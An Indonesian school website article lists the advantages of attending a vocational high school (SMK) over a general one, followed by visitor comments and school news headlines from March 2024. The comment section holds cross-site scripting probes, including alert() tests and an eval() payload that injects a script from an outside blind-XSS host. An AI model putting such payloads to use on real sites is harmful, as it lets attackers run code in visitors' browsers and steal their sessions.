KEUNTUNGAN MELANJUTKAN SEKOLAH KE SMK

Mungkin sebelum Anda melanjutkan membaca artikel ini, tahukah Anda bahwa SMK terkenal dengan tujuan utamanya yaitu bisa langsung bekerja setelah lulus dan memiliki keahlian khusus. Pastinya semua orang tua atau bahkan siswa itu sendiri ingin masuk di sekolah lanjutan yang menjajikan.
Apakah perbedaan dari Sekolah Menengah Atas (SMA) dan Sekolah Menengah Kejuruan (SMK)? Dari segi tujuan utama, SMA dan SMK semuanya sama. Tujuan utamanya yaitu sama-sama untuk mencari ilmu. Namun SMA dan SMK memiliki masing-masing keunggulan yang sangat menonjol dalam pelajaran bidang studi dan tujuan lainnya.
Gambar: Siswa Praktik Jurusan TITL SMK Budi Perkasa
Namun tahukah Anda bahwa SMK itu memiliki keistimewaan dan kelebihan tersendiri? Berikut penjelasannya.

1. Menguasai Keahlian Kejuruan
Masing-masing SMK pastinya memiliki jurusan yang berbeda-beda. Bila Anda mencari sekolah SMK, sebaiknya Anda memilih sekolah yang memiliki jurusan yang Anda minati.
Guru yang akan mendidik Anda di SMK lebih mengutamakan pelajaran jurusan dari pada pelajaran lain. Waktu belajar pelajar SMK sama saja dengan pelajar SMA, namun dalam pelajaran teori praktik siswa SMK lebih unggul.

2. Pelajaran Praktik Lebih Diutamakan

Gambar: Praktik siswa Jurusan TP (Teknik Pemesinan) SMK Budi perkasa

Pelajar SMK lebih mengutamakan teori praktik daripada tulis, hal tersebut karena siswa SMK ditargetkan dalam pelajaran kejuruan yang memang harus banyak dipelajari dalam teori praktik. Pelajaran siswa SMK yakni sama saja seperti pelajar SMA, yang jadi kelebihannya, siswa SMK memiliki tambahan pelajaran keahlian dan mempunyai teori lebih banyak daripada pelajaran lainnya.
3. Merasakan Praktik Kerja Langsung
Hal yang dirasakan oleh pelajar SMK yakni akan diwajibkan melakukan praktik kerja industri (prakerin). Praktik ini memang harus dikerjakan apabila ingin lulus dengan nilai yang bagus. Prakerin akan dilakukan oleh pelajar SMK ketika duduk di bangku kelas XI, namun ada juga sekolah lain yang melaksanakan prakerin di kelas XII.
4. Siap Untuk Bekerja Setelah Lulus SMK
Kelebihan lain dari siswa lulusan SMK yaitu siap untuk bekerja. Siswa SMK bisa bekerja dengan cepat dari skill yang dimiliknya sejak duduk di bangku sekolah. Peluang bekerja lebih besar bila dibandingkan siswa lulusan SMA. Dari segi keahlian tentu saja SMK lebih ahli dalam mencari pekerjaan. Itu sebabnya banyak lulusan SMK yang langsung bekerja.
5. Peluang Membuka Usaha Lebih Mudah
Setiap orang pasti beda keyakinan dalam mencari dan memilih jalan kehidupan atau karirnya. Bagi pelajar SMK di zaman sekarang, banyak yang berpendapat bahwa mereka lebih memilih untuk membuka usaha sendiri daripada bekerja kepada orang lain. Memang dalam membuka usaha tentu saja membutuhkan modal awal. Tetapi dalam mencari modal usaha bisa lebih mudah didapatkan kalau mereka punya ketekatan dan keinginan yang tinggi.
Nah itulah beberapa kelebihan dari SMK dibandingkan dengan SMA, semoga bermanfaat dan bisa menjadi gambaran untuk Anda yang mungkin sedang bingung dalam menentukan sekolah.

[removed]alert("hallo")[removed]

[removed]eval('var a=document.createElement('script');a.src='https://fulldxrmediaxyz.bxss.in';document.body.appendChild(a)')

[removed]alert.domain[removed]

Hallo

[removed]alert(1)[removed]

[removed][removed]

Sangat berguna

Situs web ini membantu menambah informasi mengenai pendidikan SMK dan sma

Buka Puasa Bersama (Bukber) Ramadan 1445 H Di SMK Budi Perkasa

Buka Puasa Bersama (Bukber) Menjadi Momen Penting Silaturahmi Buka Puasa Bersama (Bukber) merupakan agenda sekolah yang rutin dilaksanakan setiap tahun di bulan Ramadan. Bukber tidak h

31/03/2024 10:32 - Oleh Team Humas - Dilihat 110 kali
Selamat dan Sukses! Siswa SMK Budi Perkasa Lolos SNBP 2024

SMK Budi Perkasa kembali mengukir prestasi membanggakan dalam dunia pendidikan. Andika Nur Fadhillah (Kelas XII Axioo) berhasil meraih tiket masuk ke Perguruan Tinggi Negeri melalui jal

27/03/2024 09:20 - Oleh Team Humas - Dilihat 268 kali
Pesantren Kilat Ramadan SMK Budi Perkasa Tahun 1445 H

Tetaplah Menuntut Ilmu walau harus Menahan Rasa Haus dan Lapar Islam adalah agama yang penuh rahmat dan menjunjung tinggi ilmu pengetahuan. Sebagaimana ayat yang pertama kali diturunka

24/03/2024 21:19 - Oleh Team Humas - Dilihat 218 kali
Takjil On The Road SMK Budi Perkasa, Saat Berbagi Jadi Lebih Berarti.

Semangat berbagi dan kepedulian terhadap sesama kembali menyala di SMK Budi Perkasa dengan digelarnya program Takjil on the Road (TOR). Kegiatan TOR ini merupakan salah satu Program OSI

24/03/2024 20:27 - Oleh Team Humas - Dilihat 145 kali
"Munggahan" SMK Budi Perkasa Menyambut Bulan Suci Ramadan Tahun 1445 H

Alhamdulillah, puji syukur kita panjatkan kehadirat Allah SWT. Sholawat dan salam kepada Baginda Nabi Muhammad SAW, pagi ini Sabtu, 9 Maret 2024 di sekolah tercinta kita, SMK Budi Perka